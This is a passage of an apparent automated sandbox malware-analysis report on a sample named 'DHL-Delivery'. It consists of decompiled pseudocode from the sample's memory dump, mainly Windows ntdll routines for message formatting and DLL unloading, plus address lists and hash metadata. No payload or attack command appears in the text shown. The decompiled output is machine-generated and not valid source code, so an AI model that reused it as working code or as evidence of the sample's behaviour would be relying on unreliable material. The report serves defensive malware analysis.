                        													goto L175;
                        												}
                        												_push(0x20);
                        												L144:
                        												_t492 = _t511;
                        												_pop(_t367);
                        												_v1700 = _t492;
                        												 *_t511 = _t367;
                        												goto L153;
                        											}
                        											_t441 = _a32 - 1;
                        											_a32 = _t441;
                        											if(_t441 < 0) {
                        												goto L175;
                        											}
                        											_t368 = _v1688;
                        											if((_t368 & 0x00000007) == 0) {
                        												_t494 = 8;
                        												_t369 = _t368 + _t494;
                        											} else {
                        												_t369 = _t368 + 0x00000007 & 0xfffffff8;
                        											}
                        											_v1688 = _t369;
                        											_push(9);
                        											goto L144;
                        										}
                        										_t371 = 2;
                        										_t441 = _a32 - _t371;
                        										_a32 = _t441;
                        										if(_t441 < 0) {
                        											goto L175;
                        										}
                        										_t495 = 0xd;
                        										 *_t511 = _t495;
                        										_t516 = _t511 + _t371;
                        										_t496 = 0xa;
                        										 *_t516 = _t496;
                        										_t511 = _t516 + _t371;
                        										_t475 = _t475 + _t371;
                        										L132:
                        										_v1696 = _t511;
                        										_v1680 = _t475;
                        										goto L133;
                        									}
                        									_t441 = _a32 - 1;
                        									_a32 = _t441;
                        									if(_t441 < 0) {
                        										goto L175;
                        									}
                        									_t372 = 0xd;
                        									 *_t511 = _t372;
                        									_t511 = _t511 + 2;
                        									_t475 = _t475 + 2;
                        									goto L132;
                        								}
                        								_t479 = _t475 + 2;
                        								_pop(_t452);
                        								_v1680 = _t479;
                        								_t498 = _t445 - _t452;
                        								_t480 =  *_t479 & 0x0000ffff;
                        								_t373 = _t480;
                        								if(_t480 >= _t452) {
                        									_t453 = 0x39;
                        									_t373 = _t480;
                        									_t454 = _v1680;
                        									if(_t480 > _t453) {
                        										L31:
                        										_v1712 = _v1712 & 0x00000000;
                        										_v1720 = _t498;
                        										_t475 = 0x21;
                        										_v1732 = _t498 - 1;
                        										if(_t373 == _t475) {
                        											_t455 =  &(_t454[1]);
                        											_v1682 = 0;
                        											_t374 = 0x25;
                        											_v76 = _t374;
                        											_t492 =  &_v74;
                        											_t375 =  *_t455 & 0x0000ffff;
                        											_t475 = _t492;
                        											_v1708 = _t492;
                        											_v1680 = _t455;
                        											if(_t375 == _v1756) {
                        												L79:
                        												_v1680 =  &(_t455[1]);
                        												_t457 =  &_v68;
                        												 *_t492 = 0;
                        												_t377 = 0;
                        												_v1681 = 0;
                        												if( &_v68 > _t475) {
                        													L88:
                        													_t378 = _v1682;
                        													L33:
                        													if(_a12 != 0) {
                        														if(_t378 == 1) {
                        															L99:
                        															_t475 = _a32;
                        															_t380 = E1E116392(_t457, _t511, _a32,  &_v1716, 0, 0, L"%%%u", _v1720);
                        															_t520 = _t520 + 0x1c;
                        															L47:
                        															if(_t380 < 0) {
                        																goto L175;
                        															}
                        															_t383 = _v1716 - _t511 >> 1;
                        															_t441 = _a32 - _t383;
                        															_a32 = _t441;
                        															if(_t441 < 0) {
                        																goto L175;
                        															}
                        															_t492 = _v1700;
                        															_t511 = _t511 + _t383 * 2;
                        															_t475 = _v1680;
                        															goto L50;
                        														}
                        														_t457 = L"%s";
                        														_t384 =  &_v76;
                        														while(1) {
                        															_t481 =  *_t384;
                        															if(_t481 !=  *_t457) {
                        																break;
                        															}
                        															if(_t481 == 0) {
                        																L95:
                        																_t385 = 0;
                        																L97:
                        																if(_t385 == 0) {
                        																	goto L99;
                        																}
                        																_t475 = _a32;
                        																_push( &_v74);
                        																_t380 = E1E116392(_t457, _t511, _a32,  &_v1716, 0, 0, L"%%%u!%s!", _v1720);
                        																_t520 = _t520 + 0x20;
                        																goto L47;
                        															}
                        															_t482 =  *((intOrPtr*)(_t384 + 2));
                        															_t191 =  &(_t457[2]); // 0x73
                        															if(_t482 !=  *_t191) {
                        																break;
                        															}
                        															_t384 = _t384 + 4;
                        															_t457 =  &(_t457[4]);
                        															if(_t482 != 0) {
                        																continue;
                        															}
                        															goto L95;
                        														}
                        														asm("sbb eax, eax");
                        														_t385 = _t384 | 0x00000001;
                        														goto L97;
                        													}
                        													if(_v1692 == 0 || _v1732 + _v1712 >= 0xc8) {
                        														goto L70;
                        													} else {
                        														if(_a16 != 0) {
                        															_t459 = _t492 - 2;
                        															_t483 =  *_t459 & 0x0000ffff;
                        															_t390 = 0x63;
                        															if(_t483 != _t390) {
                        																L105:
                        																_t391 = 0x73;
                        																if(_t483 != _t391) {
                        																	L112:
                        																	if(_t483 == 0x53) {
                        																		L115:
                        																		 *_t459 = _t391;
                        																		goto L37;
                        																	}
                        																	if(_t483 != 0x43) {
                        																		goto L37;
                        																	}
                        																	_t391 = 0x63;
                        																	goto L115;
                        																}
                        																_t410 =  *(_t492 - 4) & 0x0000ffff;
                        																_t503 = 0x68;
                        																if(_t410 == _t503) {
                        																	L111:
                        																	_t391 = 0x73;
                        																	goto L112;
                        																}
                        																_t504 = 0x77;
                        																if(_t410 == _t504) {
                        																	goto L111;
                        																}
                        																_t505 = 0x6c;
                        																if(_t410 == _t505) {
                        																	goto L111;
                        																}
                        																_push(L"hs");
                        																L110:
                        																_t486 = 3;
                        																E1E1748FE(_t459, _t486);
                        																goto L37;
                        															}
                        															_t412 =  *(_t492 - 4) & 0x0000ffff;
                        															if(_t412 == _v1776 || _t412 == _v1780 || _t412 == _v1784) {
                        																goto L105;
                        															} else {
                        																_push(L"hc");
                        																goto L110;
                        															}
                        														}
                        														L37:
                        														_t500 = _v1732;
                        														_t460 = _v1704;
                        														if(_t500 < _t460) {
                        															L44:
                        															_t461 =  *(_t519 + _t500 * 8 - 0x688);
                        															_t484 = 0;
                        															_t392 = _v1712;
                        															_v1720 = _t461;
                        															_v1708 = _t461;
                        															if(_t392 != 0) {
                        																if(_a20 == 0) {
                        																	_t393 = _v1692;
                        																	 *_t393 =  *_t393 + 4;
                        																	_t492 =  *( *_t393 - 4);
                        																	_t392 = _v1712;
                        																} else {
                        																	_t436 = _v1704;
                        																	 *(_t519 + _t436 * 8 - 0x684) =  *(_t519 + _t436 * 8 - 0x684) & 0;
                        																	_t492 =  *_v1692;
                        																	 *(_t519 + _t436 * 8 - 0x688) = _t492;
                        																	_v1692 = _v1692 + 4;
                        																	_v1704 = _t436 + 1;
                        																	_t434 = _v1736;
                        																}
                        																if(_t392 > 1) {
                        																	_t400 = _v1704;
                        																	_t462 = _t400;
                        																	_v1704 = _t400 + 1;
                        																	_t402 = _v1692;
                        																	if(_a20 == _t484) {
                        																		 *_t402 =  *_t402 + 4;
                        																		 *(_t519 + _t462 * 8 - 0x684) =  *(_t519 + _t462 * 8 - 0x684) & 0x00000000;
                        																		_t484 =  *((intOrPtr*)( *_t402 - 4));
                        																	} else {
                        																		_t484 =  *_t402;
                        																		 *(_t519 + _t462 * 8 - 0x684) =  *(_t519 + _t462 * 8 - 0x684) & 0x00000000;
                        																		_v1692 = _t402 + 4;
                        																	}
                        																	 *((intOrPtr*)(_t519 + _t462 * 8 - 0x688)) = _t484;
                        																	_t461 = _v1720;
                        																}
                        															}
                        															_push(_t484);
                        															_t475 = _a32;
                        															_push(_t492);
                        															if(_v1681 != 0) {
                        																_push( *((intOrPtr*)(_t519 + _v1732 * 8 - 0x684)));
                        																_t380 = E1E116392(_t461, _t511, _t475,  &_v1716, 0, 0,  &_v76,  *((intOrPtr*)(_t519 + _v1732 * 8 - 0x688)));
                        																_t520 = _t520 + 0x28;
                        															} else {
                        																_t380 = E1E116392(_t461, _t511, _t475,  &_v1716, 0, 0,  &_v76, _t461);
                        																_t520 = _t520 + 0x24;
                        															}
                        															goto L47;
                        														}
                        														_t438 = _v1681;
                        														_t517 = _v1692;
                        														do {
                        															_t86 = _t460 + 1; // 0x1
                        															_t485 = _t86;
                        															_t406 =  *_t517;
                        															if(_a20 == 0) {
                        																if(_t438 != 0) {
                        																	_t205 = _t406 + 8; // 0x7b
                        																	_t463 = _t205;
                        																	 *_t517 = _t463;
                        																	_t518 = _v1704;
                        																	 *((intOrPtr*)(_t519 + _t518 * 8 - 0x688)) =  *((intOrPtr*)(_t463 - 8));
                        																	_t517 = _v1692;
                        																	 *((intOrPtr*)(_t519 + _t518 * 8 - 0x684)) =  *((intOrPtr*)(_t463 - 4));
                        																	goto L42;
                        																}
                        																_t409 = _t406 + 4;
                        																 *(_t519 + _t460 * 8 - 0x684) =  *(_t519 + _t460 * 8 - 0x684) & 0x00000000;
                        																 *_t517 = _t409;
                        																_t406 =  *((intOrPtr*)(_t409 - 4));
                        																L41:
                        																 *((intOrPtr*)(_t519 + _t460 * 8 - 0x688)) = _t406;
                        																goto L42;
                        															}
                        															 *(_t519 + _t460 * 8 - 0x684) =  *(_t519 + _t460 * 8 - 0x684) & 0x00000000;
                        															_t517 = _t517 + 4;
                        															_v1692 = _t517;
                        															goto L41;
                        															L42:
                        															_t460 = _t485;
                        															_v1704 = _t460;
                        														} while (_t485 <= _t500);
                        														_t511 = _v1696;
                        														_t434 = _v1736;
                        														_v1704 = _t485;
                        														goto L44;
                        													}
                        												}
                        												_t457 =  &_v70;
                        												while(_t377 == 0) {
                        													if( *((short*)(_t457 - 4)) == 0x49 &&  *((short*)(_t457 - 2)) == 0x36 &&  *_t457 == 0x34) {
                        														_v1681 = 1;
                        													}
                        													_t457 =  &(_t457[2]);
                        													if( &(_t457[2]) <= _t492) {
                        														_t377 = _v1681;
                        														continue;
                        													} else {
                        														goto L88;
                        													}
                        												}
                        												goto L88;
                        											}
                        											_t465 = _t375;
                        											while(_t465 != 0 && _t492 <  &_v14) {
                        												_t415 = 0x2a;
                        												_t487 = _t465 & 0x0000ffff;
                        												if(_t465 != _t415) {
                        													L77:
                        													 *_v1708 = _t487;
                        													_t475 = _t492 + 2;
                        													_t492 = _t475;
                        													_t418 = _v1680 + 2;
                        													_v1708 = _t475;
                        													_v1680 = _t418;
                        													_t419 =  *_t418 & 0x0000ffff;
                        													_t465 = _t419;
                        													if(_t419 != _v1756) {
                        														continue;
                        													}
                        													_t455 = _v1680;
                        													goto L79;
                        												}
                        												_t466 = _v1712;
                        												_v1712 = _t466 + 1;
                        												_t475 = 0x2a;
                        												if(_t466 > 1) {
                        													goto L70;
                        												}
                        												goto L77;
                        											}
                        											goto L70;
                        										}
                        										_push(_t454);
                        										_push(_t454);
                        										_t457 =  &_v76;
                        										E1E1162DB( &_v76, _t454,  &_v1708);
                        										_t492 = _v1708;
                        										_t378 = 1;
                        										_v1681 = 0;
                        										goto L33;
                        									}
                        									_t454 =  &(_t454[1]);
                        									_v1680 = _t454;
                        									_t498 = _t498 * 0xa + _t480 + 0xffffffd0;
                        									_t489 =  *_t454 & 0x0000ffff;
                        									_t373 = _t489;
                        									if(_t489 < _v1768 || _t489 > _v1772) {
                        										goto L31;
                        									} else {
                        										_t424 = _v1680 + 2;
                        										_v1680 = _t424;
                        										_t490 = 0x30;
                        										_t498 = _t489 + 0xffffffd0 + _t498 * 0xa;
                        										_t469 =  *_t424 & 0x0000ffff;
                        										_t373 = _t469;
                        										if(_t469 < _t490) {
                        											goto L30;
                        										}
                        										_t475 = 0x39;
                        										if(_t469 > _t475) {
                        											goto L30;
                        										}
                        										goto L70;
                        									}
                        								}
                        								L30:
                        								_t454 = _v1680;
                        								goto L31;
                        							}
                        							_v1680 = _t475;
                        							if(_t331 == _v1788 || _t331 == _v1792) {
                        								_t493 = 0xa;
                        								_t492 = 0xd;
                        								if(_t331 == _t493) {
                        									if( *_t475 == _t492) {
                        										L24:
                        										_t475 = _t475 + 2;
                        										_v1680 = _t475;
                        										L25:
                        										if(_a8 != 0) {
                        											_t492 = _t511;
                        											_v1700 = _t492;
                        											_t331 = 0x20;
                        											goto L9;
                        										}
                        										_t441 = _t441 - 2;
                        										_a32 = _t441;
                        										if(_t441 < 0) {
                        											goto L175;
                        										}
                        										 *_t511 = _t492;
                        										_t492 = 0;
                        										_t426 = 0xa;
                        										 *(_t511 + 2) = _t426;
                        										_t511 = _t511 + 4;
                        										_v1688 = _v1688 & 0;
                        										_v1696 = _t511;
                        										_v1700 = 0;
                        										_v1724 = _t475;
                        										continue;
                        									}
                        								}
                        								if(_t331 != _t492) {
                        									goto L25;
                        								}
                        								_t427 = 0xa;
                        								if( *_t475 != _t427) {
                        									goto L25;
                        								}
                        								goto L24;
                        							} else {
                        								L9:
                        								_t441 = _t441 - 1;
                        								_a32 = _t441;
                        								if(_t441 < 0) {
                        									goto L175;
                        								} else {
                        									if(_t331 == _v1744) {
                        										_t492 = _t511;
                        										_v1700 = _t492;
                        									}
                        									 *_t511 = _t331;
                        									_t511 = _t511 + 2;
                        									_v1696 = _t511;
                        									_t345 = _v1688 + 1;
                        									goto L12;
                        								}
                        							}
                        						}
                        						if(_a32 < 1) {
                        							goto L175;
                        						}
                        						 *_t511 = 0;
                        						_t342 = _v1796;
                        						if(_t342 != 0) {
                        							 *_t342 = _t511;
                        						}
                        						_t332 = 0;
                        						goto L20;
                        					}
                        				}
                        				_t470 =  *_t434;
                        				if((_t470 & 0x00000001) != 0) {
                        					_t471 = _t470 & 0xfffffffe;
                        					_t475 = _t434[3];
                        					 *_t434 = _t471;
                        					_t430 = _t510 + _t434[2] * 2;
                        					_v1680 = _t430;
                        					_t511 = _t491 + _t475 * 2;
                        					_v1724 = _t430;
                        					_v1688 = _t434[1];
                        					_t432 = _t434[4];
                        					_v1696 = _t511;
                        					if(_t432 != 0xffffffff) {
                        						_t492 = _t491 + _t432 * 2;
                        					} else {
                        						_t492 = 0;
                        					}
                        					_a32 = _a32 - _t475;
                        					_v1700 = _t492;
                        					if(_a20 == 0) {
                        						_t475 = _v1692;
                        						if(_t475 != 0) {
                        							 *_t475 = _t434[5];
                        							_t471 =  *_t434;
                        						}
                        					}
                        					if((_t471 & 0x00000002) == 0) {
                        						_t475 = _v1680;
                        						goto L4;
                        					} else {
                        						 *_t434 = _t471 & 0xfffffffd;
                        						_t441 = _a32;
                        						goto L160;
                        					}
                        				}
                        				goto L2;
                        			}
                        0x1e152d7a
                        0x1e152d7b
                        0x1e152d7e
                        0x1e152d7e
                        0x1e152d84
                        0x1e152d86
                        0x1e152d89
                        0x1e152d8f
                        0x00000000
                        0x1e152d8f
                        0x1e152c60
                        0x1e152c62
                        0x1e152c63
                        0x1e152c63
                        0x1e152c69
                        0x00000000
                        0x00000000
                        0x1e152c74
                        0x1e152c79
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e152c79
                        0x1e152c81
                        0x1e152cb2
                        0x1e152cb6
                        0x1e152cbb
                        0x1e152d16
                        0x1e152d20
                        0x1e152d20
                        0x1e152d23
                        0x1e152d29
                        0x1e152d37
                        0x1e152d3c
                        0x1e152d3f
                        0x1e152d44
                        0x1e152d45
                        0x1e152d48
                        0x1e152d4d
                        0x1e152d4e
                        0x1e152d57
                        0x00000000
                        0x1e152d57
                        0x1e152cbd
                        0x1e152cbd
                        0x1e152cc0
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e152cc0
                        0x1e152c83
                        0x1e152c89
                        0x1e152c89
                        0x1e152c94
                        0x00000000
                        0x00000000
                        0x1e152c9f
                        0x1e152ca4
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e152ca4
                        0x1e152ca6
                        0x1e152cac
                        0x00000000
                        0x1e152cac
                        0x1e116030
                        0x1e116298
                        0x1e11629e
                        0x00000000
                        0x1e11629e
                        0x1e152be6
                        0x1e152be9
                        0x1e152bec
                        0x00000000
                        0x00000000
                        0x1e152bf4
                        0x1e152bf5
                        0x1e152bfb
                        0x1e152bff
                        0x00000000
                        0x1e152bff
                        0x1e152bcf
                        0x1e152bd2
                        0x1e152bd5
                        0x00000000
                        0x00000000
                        0x1e152bb7
                        0x1e152bb9
                        0x1e152bb9
                        0x1e152bbb
                        0x1e152bbc
                        0x1e152bc2
                        0x00000000
                        0x1e152bc2
                        0x1e152b8a
                        0x1e152b8d
                        0x1e152b90
                        0x00000000
                        0x00000000
                        0x1e152b96
                        0x1e152b9e
                        0x1e152baa
                        0x1e152bab
                        0x1e152ba0
                        0x1e152ba3
                        0x1e152ba3
                        0x1e152bad
                        0x1e152bb3
                        0x00000000
                        0x1e152bb3
                        0x1e152b74
                        0x1e152b75
                        0x1e152b77
                        0x1e152b7a
                        0x00000000
                        0x00000000
                        0x1e152b3f
                        0x1e152b40
                        0x1e152b43
                        0x1e152b47
                        0x1e152b48
                        0x1e152b4b
                        0x1e152b4d
                        0x1e152b4f
                        0x1e152b4f
                        0x1e152b55
                        0x00000000
                        0x1e152b55
                        0x1e152b23
                        0x1e152b26
                        0x1e152b29
                        0x00000000
                        0x00000000
                        0x1e152b31
                        0x1e152b32
                        0x1e152b35
                        0x1e152b38
                        0x00000000
                        0x1e152b38
                        0x1e1160ff
                        0x1e116104
                        0x1e116105
                        0x1e11610b
                        0x1e11610d
                        0x1e116110
                        0x1e116115
                        0x1e152771
                        0x1e152775
                        0x1e152777
                        0x1e15277d
                        0x1e116121
                        0x1e116121
                        0x1e11612a
                        0x1e116131
                        0x1e116132
                        0x1e11613b
                        0x1e1527f3
                        0x1e1527f6
                        0x1e1527ff
                        0x1e152800
                        0x1e152804
                        0x1e152807
                        0x1e15280a
                        0x1e15280c
                        0x1e152812
                        0x1e15281f
                        0x1e152888
                        0x1e15288d
                        0x1e152893
                        0x1e152896
                        0x1e152899
                        0x1e15289b
                        0x1e1528a3
                        0x1e1528d9
                        0x1e1528d9
                        0x1e116162
                        0x1e116166
                        0x1e1528e6
                        0x1e15294b
                        0x1e152951
                        0x1e152966
                        0x1e15296b
                        0x1e11624c
                        0x1e11624e
                        0x00000000
                        0x00000000
                        0x1e11625f
                        0x1e116261
                        0x1e116263
                        0x1e116266
                        0x00000000
                        0x00000000
                        0x1e11626c
                        0x1e116272
                        0x1e116275
                        0x00000000
                        0x1e116275
                        0x1e1528e8
                        0x1e1528ed
                        0x1e1528f0
                        0x1e1528f0
                        0x1e1528f6
                        0x00000000
                        0x00000000
                        0x1e1528fb
                        0x1e152912
                        0x1e152912
                        0x1e15291b
                        0x1e15291d
                        0x00000000
                        0x00000000
                        0x1e15291f
                        0x1e152925
                        0x1e15293e
                        0x1e152943
                        0x00000000
                        0x1e152943
                        0x1e1528fd
                        0x1e152901
                        0x1e152905
                        0x00000000
                        0x00000000
                        0x1e152907
                        0x1e15290a
                        0x1e152910
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e152910
                        0x1e152916
                        0x1e152918
                        0x00000000
                        0x1e152918
                        0x1e116173
                        0x00000000
                        0x1e116190
                        0x1e116194
                        0x1e152973
                        0x1e152976
                        0x1e15297b
                        0x1e15297f
                        0x1e1529a7
                        0x1e1529a9
                        0x1e1529ad
                        0x1e1529e0
                        0x1e1529e3
                        0x1e1529f1
                        0x1e1529f1
                        0x00000000
                        0x1e1529f1
                        0x1e1529e8
                        0x00000000
                        0x00000000
                        0x1e1529f0
                        0x00000000
                        0x1e1529f0
                        0x1e1529af
                        0x1e1529b5
                        0x1e1529b9
                        0x1e1529dd
                        0x1e1529df
                        0x00000000
                        0x1e1529df
                        0x1e1529bd
                        0x1e1529c1
                        0x00000000
                        0x00000000
                        0x1e1529c5
                        0x1e1529c9
                        0x00000000
                        0x00000000
                        0x1e1529cb
                        0x1e1529d0
                        0x1e1529d2
                        0x1e1529d3
                        0x00000000
                        0x1e1529d3
                        0x1e152981
                        0x1e15298c
                        0x00000000
                        0x1e1529a0
                        0x1e1529a0
                        0x00000000
                        0x1e1529a0
                        0x1e15298c
                        0x1e11619a
                        0x1e11619a
                        0x1e1161a0
                        0x1e1161a8
                        0x1e1161fb
                        0x1e1161fb
                        0x1e116202
                        0x1e116204
                        0x1e11620c
                        0x1e116212
                        0x1e11621a
                        0x1e152a28
                        0x1e152a5c
                        0x1e152a62
                        0x1e152a67
                        0x1e152a6a
                        0x1e152a2a
                        0x1e152a2a
                        0x1e152a36
                        0x1e152a3d
                        0x1e152a3f
                        0x1e152a47
                        0x1e152a4e
                        0x1e152a54
                        0x1e152a54
                        0x1e152a73
                        0x1e152a79
                        0x1e152a7f
                        0x1e152a82
                        0x1e152a88
                        0x1e152a91
                        0x1e152aa8
                        0x1e152aad
                        0x1e152ab5
                        0x1e152a93
                        0x1e152a93
                        0x1e152a95
                        0x1e152aa0
                        0x1e152aa0
                        0x1e152ac4
                        0x1e152acb
                        0x1e152acb
                        0x1e152a73
                        0x1e116227
                        0x1e116228
                        0x1e11622b
                        0x1e11622c
                        0x1e152adc
                        0x1e152afb
                        0x1e152b00
                        0x1e116232
                        0x1e116244
                        0x1e116249
                        0x1e116249
                        0x00000000
                        0x1e11622c
                        0x1e1161aa
                        0x1e1161b0
                        0x1e1161b6
                        0x1e1161ba
                        0x1e1161ba
                        0x1e1161bd
                        0x1e1161bf
                        0x1e1162c0
                        0x1e1529f9
                        0x1e1529f9
                        0x1e1529fc
                        0x1e1529fe
                        0x1e152a07
                        0x1e152a13
                        0x1e152a19
                        0x00000000
                        0x1e152a19
                        0x1e1162c6
                        0x1e1162c9
                        0x1e1162d1
                        0x1e1162d3
                        0x1e1161d6
                        0x1e1161d6
                        0x00000000
                        0x1e1161d6
                        0x1e1161c5
                        0x1e1161cd
                        0x1e1161d0
                        0x00000000
                        0x1e1161dd
                        0x1e1161dd
                        0x1e1161df
                        0x1e1161e5
                        0x1e1161e9
                        0x1e1161ef
                        0x1e1161f5
                        0x00000000
                        0x1e1161f5
                        0x1e116173
                        0x1e1528a5
                        0x1e1528b0
                        0x1e1528b9
                        0x1e1528c8
                        0x1e1528c8
                        0x1e1528cf
                        0x1e1528d7
                        0x1e1528aa
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e1528d7
                        0x00000000
                        0x1e1528b0
                        0x1e152821
                        0x1e152823
                        0x1e152831
                        0x1e152832
                        0x1e152838
                        0x1e152851
                        0x1e152857
                        0x1e15285a
                        0x1e152863
                        0x1e152865
                        0x1e152868
                        0x1e15286e
                        0x1e152874
                        0x1e152877
                        0x1e152880
                        0x00000000
                        0x00000000
                        0x1e152882
                        0x00000000
                        0x1e152882
                        0x1e15283a
                        0x1e152843
                        0x1e15284b
                        0x1e15284f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e15284f
                        0x00000000
                        0x1e152823
                        0x1e116141
                        0x1e116142
                        0x1e11614b
                        0x1e11614e
                        0x1e116153
                        0x1e116159
                        0x1e11615b
                        0x00000000
                        0x1e11615b
                        0x1e152786
                        0x1e15278c
                        0x1e152792
                        0x1e152794
                        0x1e152797
                        0x1e1527a0
                        0x00000000
                        0x1e1527b3
                        0x1e1527bc
                        0x1e1527c1
                        0x1e1527cc
                        0x1e1527cd
                        0x1e1527cf
                        0x1e1527d2
                        0x1e1527d7
                        0x00000000
                        0x00000000
                        0x1e1527df
                        0x1e1527e3
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e1527e3
                        0x1e1527a0
                        0x1e11611b
                        0x1e11611b
                        0x00000000
                        0x1e11611b
                        0x1e115fd8
                        0x1e115fe5
                        0x1e11607f
                        0x1e116085
                        0x1e116086
                        0x1e152c28
                        0x1e116099
                        0x1e116099
                        0x1e11609c
                        0x1e1160a2
                        0x1e1160a6
                        0x1e152c33
                        0x1e152c37
                        0x1e152c3d
                        0x00000000
                        0x1e152c3d
                        0x1e1160ac
                        0x1e1160af
                        0x1e1160b2
                        0x00000000
                        0x00000000
                        0x1e1160ba
                        0x1e1160bd
                        0x1e1160bf
                        0x1e1160c0
                        0x1e1160c4
                        0x1e1160c7
                        0x1e1160cd
                        0x1e1160d3
                        0x1e1160d9
                        0x00000000
                        0x1e1160d9
                        0x1e152c2e
                        0x1e11608f
                        0x00000000
                        0x00000000
                        0x1e116093
                        0x1e116097
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e115ff8
                        0x1e115ff8
                        0x1e115ff8
                        0x1e115ffb
                        0x1e115ffe
                        0x00000000
                        0x1e116004
                        0x1e11600b
                        0x1e116037
                        0x1e116039
                        0x1e116039
                        0x1e11600d
                        0x1e116010
                        0x1e116019
                        0x1e11601f
                        0x00000000
                        0x1e11601f
                        0x1e115ffe
                        0x1e115fe5
                        0x1e116045
                        0x00000000
                        0x00000000
                        0x1e11604d
                        0x1e116050
                        0x1e116058
                        0x1e116066
                        0x1e116066
                        0x1e116068
                        0x00000000
                        0x1e116068
                        0x1e115fb3
                        0x1e115f80
                        0x1e115f85
                        0x1e1526fa
                        0x1e1526fd
                        0x1e152700
                        0x1e152702
                        0x1e152705
                        0x1e15270b
                        0x1e15270e
                        0x1e152717
                        0x1e15271d
                        0x1e152720
                        0x1e152729
                        0x1e15272f
                        0x1e15272b
                        0x1e15272b
                        0x1e15272b
                        0x1e152732
                        0x1e152739
                        0x1e15273f
                        0x1e152741
                        0x1e152749
                        0x1e15274e
                        0x1e152750
                        0x1e152750
                        0x1e152749
                        0x1e152755
                        0x1e152764
                        0x00000000
                        0x1e152757
                        0x1e15275a
                        0x1e15275c
                        0x00000000
                        0x1e15275c
                        0x1e152755
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                        • API String ID: 0-360209818
                        • Opcode ID: 459bdb119674cfcc30b5b01c9248fada5efe467a4d0874530c652d5c665a474c
                        • Instruction ID: 4256d0ad84b96732f11a28928d4cf3f42864557c5286893be15bc506842c856c
                        • Opcode Fuzzy Hash: 459bdb119674cfcc30b5b01c9248fada5efe467a4d0874530c652d5c665a474c
                        • Instruction Fuzzy Hash: 1462B0B2A002298FDB24CF14C9507D9B7B2BF95710F6182EAE858AB384D7725ED1CF50
                        Uniqueness

                        Uniqueness Score: 100.00%

                        C-Code - Quality: 81%
                        			E1E109F1C(intOrPtr* __ecx, void* __edx) {
                        				char _v8;
                        				intOrPtr* _v12;
                        				signed int _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				intOrPtr* _v28;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				signed int _t45;
                        				intOrPtr _t50;
                        				intOrPtr _t59;
                        				intOrPtr _t70;
                        				signed int _t71;
                        				signed int _t80;
                        				signed int _t82;
                        				signed int _t83;
                        				intOrPtr* _t85;
                        				intOrPtr _t86;
                        				intOrPtr* _t87;
                        				void* _t88;
                        				signed int _t89;
                        				signed int _t93;
                        				signed int _t99;
                        				intOrPtr* _t100;
                        				void* _t102;
                        				void* _t103;
                        				intOrPtr* _t104;
                        				signed int _t105;
                        				intOrPtr* _t106;
                        				void* _t108;
                        				intOrPtr* _t110;
                        				signed int _t112;
                        				signed int _t113;
                        				void* _t115;
                        				void* _t120;
                        
                        				_t87 = __ecx;
                        				_t115 = (_t113 & 0xfffffff8) - 0x14;
                        				_t45 =  *[fs:0x30];
                        				_t110 = __ecx;
                        				_v16 = _t45;
                        				_t82 = 0;
                        				_v12 = __ecx;
                        				_push(_t103);
                        				if( *((intOrPtr*)(__ecx + 0x20)) == 0xfffffffc) {
                        					L3:
                        					 *(_t110 + 0x20) =  *(_t110 + 0x20) | 0xffffffff;
                        					E1E10ADE1(_t82, _t87, _t103, _t110,  *(_t110 + 0x20));
                        					L4:
                        					_t120 =  *0x1e1d14b0 - _t82; // 0x0
                        					if(_t120 != 0) {
                        						_t99 =  *0x7ffe0330;
                        						_t83 =  *0x1e1d4214; // 0x0
                        						_t88 = 0x20;
                        						_t87 = _t88 - (_t99 & 0x0000001f);
                        						asm("ror ebx, cl");
                        						_t82 = _t83 ^ _t99;
                        					}
                        					E1E0FFDF0(0x1e1ce2d8);
                        					_t50 =  *_t110;
                        					while(1) {
                        						_v20 = _t50;
                        						if(_t50 == _t110) {
                        							break;
                        						}
                        						_t20 = _t50 - 0x54; // -84
                        						_t104 = _t20;
                        						__eflags =  *(_t104 + 0x34) & 0x00000008;
                        						if(( *(_t104 + 0x34) & 0x00000008) != 0) {
                        							_push(_t87);
                        							_t102 = 2;
                        							E1E1024F4(_t104, _t102);
                        							__eflags = _t82;
                        							if(_t82 != 0) {
                        								 *0x1e1d41e0(_t104);
                        								 *_t82();
                        							}
                        							_t87 = _t104;
                        							E1E102561(_t87, 1);
                        							_t59 = _v24;
                        							__eflags =  *(_t59 + 0x68) & 0x00000100;
                        							if(( *(_t59 + 0x68) & 0x00000100) != 0) {
                        								_t87 = _t104;
                        								E1E165C8C(_t87);
                        							}
                        						}
                        						__eflags =  *0x1e1ce7b0 & 0x00000005;
                        						if(__eflags != 0) {
                        							_t44 = _t104 + 0x24; // -48
                        							E1E15BDA0("minkernel\\ntdll\\ldrsnap.c", 0xcd3, "LdrpUnloadNode", 2, "Unmapping DLL \"%wZ\"\n", _t44);
                        							_t115 = _t115 + 0x18;
                        						}
                        						_push(0);
                        						_push( *((intOrPtr*)(_t104 + 0x18)));
                        						E1E10ACB0(_t82, _t87, _t104, _t110, __eflags);
                        						_t50 =  *_v28;
                        					}
                        					_t45 = E1E0FFFF0(_t87, 0x1e1ce2d8);
                        					while(1) {
                        						L8:
                        						_t89 =  *(_t110 + 0x18);
                        						if(_t89 == 0) {
                        							break;
                        						}
                        						_t105 =  *_t89;
                        						__eflags = _t105 - _t89;
                        						if(_t105 == _t89) {
                        							 *(_t110 + 0x18) =  *(_t110 + 0x18) & 0x00000000;
                        						} else {
                        							_t45 =  *_t105;
                        							 *_t89 = _t45;
                        						}
                        						__eflags = _t105;
                        						if(_t105 == 0) {
                        							break;
